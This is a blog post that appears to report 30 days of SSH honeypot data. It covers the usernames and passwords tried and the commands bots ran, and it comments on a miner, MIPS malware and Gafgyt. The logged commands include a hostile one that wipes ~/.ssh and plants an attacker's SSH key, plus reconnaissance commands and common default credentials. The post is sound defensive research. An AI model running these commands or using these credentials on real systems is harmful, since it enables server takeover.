Trapping Chinese and Russian Bots Using an SSH Honeypot

4 months ago 8

What You Get After Running an SSH Honeypot for 30 days

What is a honeypot?

A honeypot detects and records attacks when an attacker tries to break into a system. The honeypot we will discuss here is an SSH honeypot.

Why?

No idea, I just did it for research purposes and personal satisfaction…

Environment

OS: Ubuntu 24.04 LTS x86_64 Kernel: 6.8.0-31-generic

cat X.log | grep -c "login attempt" 11599

There were a total of 11,599 login attempts. Divided by 30 days, this means an average of 386 login attempts per day.

cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $2}' | sort | uniq -c | sort -nr | head 8181 root 977 345gs5662d34 359 admin 198 pi 105 0 71 ubuntu 51 ubnt 46 support 37 user 30 oracle

As expected, there are many attacks that target customary and default usernames.

For the 345gs5662d34 user, according to the Aalborg University of Denmark Research this could be the default credential for a Polycom CX600 IP telephone

Check it here :
SweetCam: an IP Camera Honeypot

Passwords

cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $4}' | sort | uniq -c | sort -nr | head 977 345gs5662d34 967 3245gs5662d34 246 admin 239 123456 208 password 155 0 88 root 75 raspberry 73 123 66 raspberryraspberry993311

Once again, the same as the default username for Polycom CX600 IP telephone

cat X.log | grep -a "CMD" | awk -F'CMD: ' '{print $2}' | sort | uniq -c | sort -nr 6775 echo -e "\x6F\x6B" 1016 cd ~; chattr -ia .ssh; lockr -ia .ssh 1016 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ 320 uname -s -v -n -r -m 112 ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe; 87 uname -a 29 ps | grep '[Mm]iner' 29 ps -ef | grep '[Mm]iner' 29 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/ /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/ 29 ifconfig 29 echo Hi | cat -n 29 cat /proc/cpuinfo 29 /ip cloud print 23 whoami 23 which ls 23 w 23 uname -m 23 uname 23 top 23 lscpu | grep Model 23 ls -lh $(which ls) 23 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' 23 df -h | head -n 2 | awk 'FNR == 2 {print $2;}' 23 crontab -l 23 cat /proc/cpuinfo | grep name | wc -l 23 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' 23 cat /proc/cpuinfo | grep model | grep name | wc -l

Now the interesting part starts

The oinasf script

What You Get After Running an SSH Honeypot for 30 days

The execution of a mysterious script, ./oinasf, followed by attempts to read and display the system’s executable
content, indicates a probing strategy for vulnerabilities or valuable
information. The use of /ip cloud print suggests that bots target
MikroTik routers to access or disrupt cloud-based services, while
uname -s -m provides them with essential details about the operating system and machine architecture, valuable for crafting further
actions tailored to the system’s specifics. In conclusion, these commands represent a clear strategy to infiltrate, assess, and establish
control over targeted systems. They emphasize the bots’ preference
for direct manipulation and sustained access, highlighting the critical need for robust defenses against such common yet potentially
devastating tactics.

The mdrfckr crypto miner

What You Get After Running an SSH Honeypot for 30 days

This miner would simply create a cron job that would delete everything on the .ssh folder and add a single ssh key and lock other users out.

After that it would kill other miners if they exist and just have the open field.

You can check this repo of someone who already got hacked and the miner was used on his server : Dump of the crypto-miner that got installed on my system - Github

The MIPS malware

What You Get After Running an SSH Honeypot for 30 days

Probably another MIPS (Multiprocessor without Interlocked Pipeline Stages) architecture malware, targeting routers and IoT devices.

Here is a good read and analysis of the behaviour of a MIPS Malware :
Analyzing a Backdoor/Bot for the MIPS Platform

The Sakura.sh Script

What You Get After Running an SSH Honeypot for 30 days

This script is part of the Gafgyt Malware.

Gafgyt, also known as BASHLITE, is a botnet affecting Internet of Things (IoT) devices and Linux-based systems. The malware aims to compromise and gain control of these devices, often by exploiting weak or default passwords, as well as known vulnerabilities. Gafgyt has been around since 2014 and has evolved into multiple variants, each with its own set of features and capabilities, including the ability to launch distributed denial of service (DDoS) attacks.

Here is A Detailed Analysis of the Gafgyt Malware Targeting IoT Devices

Read Entire Article